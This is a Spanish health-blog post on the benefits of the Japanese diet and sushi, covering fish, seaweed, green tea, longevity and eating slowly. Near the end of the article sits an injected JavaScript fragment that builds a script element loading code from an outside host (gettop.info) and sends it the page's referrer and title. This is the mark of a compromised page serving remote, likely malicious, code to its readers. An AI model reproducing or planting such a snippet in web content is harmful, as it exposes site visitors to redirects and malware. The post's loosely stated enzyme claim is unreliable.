Salud y belleza » Dieta, Salud

Comer sushi puede ser beneficioso para la salud

Sin Comentarios

La dieta japonesa es ideal si quieres mantener la línea pero además aporta muchos beneficios para tu salud. Es una dieta rica en antioxidantes y ácidos omega 3 que nos ayudan a prevenir cierto tipo de enfermedades.

dietas-japonesas

La dieta japonesa se basa en alimentos como el arroz, el miso, el wasabi, el té o las algas. Por supuesto, comen mucho pescado. Son alimentos, por lo general, muy saludables para el organismo y lo mejor es que apenas consumen productos con azúcar o grasas saturadas. Por eso muchos expertos aseguran que la dieta japonesa es muy equilibrada. En Japón, solo hay un 3.9% de personas obesas.

Por tanto, adoptar algunos de los hábitos alimenticios de los japoneses podría ayudarnos a llevar una dieta mucho más equilibrada y consciente. El simple hábito de coger la comida con los palillos puede hacer que comamos más despacio y pausado para que el cerebro reconozca la sensación de saciedad. Esto favorece las digestiones más sencillas, previene los gases y produce menor sensación de hinchazón.

Además, la dieta japonesa se asocia a una gran longevidad. Se ha descubierto que los japoneses viven más años, sobre todo los de las zonas rurales que siguen mejor esta dieta tradicional. Consumen mucho salmón y atún, lo que les proporciona omega 3 y antioxidantes para garantizar una buena salud interna, además de una mejora de la piel y el cabello.

comer-sushi-salud

Esta dieta prescinde casi por completo de la carne y los productos lácteos y opta por otros como las frutas, verduras, algas o hierbas que aportan nutrientes como el calcio, el hierro, el yodo o el potasio.

El té verde, además, gana también al café porque además de dar energía tiene propiedades antioxidantes y ayuda a prevenir cierto tipo de enfermedades.

Sin embargo, para quien no esté acostumbrado a la dieta japonesa es preferible no abusar, ya que los japoneses suelen digerir mejor esta comida por la presencia de porfirasa, una enzima digestiva que no tienen los europeos y los americanos y que ayuda a digerir las algas que se usan en el sushi.

¿Conocías los beneficios de la dieta japonesa?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.